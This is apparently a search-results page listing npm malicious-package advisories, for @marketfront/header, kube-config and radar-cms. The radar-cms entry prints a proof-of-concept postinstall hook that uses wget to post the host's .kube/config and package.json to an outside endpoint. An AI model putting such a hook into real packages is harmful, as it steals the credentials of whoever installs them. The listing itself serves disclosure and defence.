4 matches found
Malicious code in @marketfront/header (npm)
The @marketfront/header package is part of a 25-package malicious campaign batch-published to the @marketfront npm scope by npm user 'marketfront' [email protected] within a roughly 3-minute window on 2026-07-01. All packages in the campaign were published at version 7.0.0 and use...
Malicious code in kube-config (npm)
The package kube-config was found to contain malicious code...
MAL-2025-24798 Malicious code in kube-config (npm)
The package kube-config was found to contain malicious code...
Malicious Package
Overview radar-cms is a malicious package. The package was found to have a post-install command which when executed will exfiltrate multiple files from a host machine. PoC "postinstall": "wget --post-file /.kube/config https://entfet95itcxpuu.m.pipedream.net;wget --post-file package.json...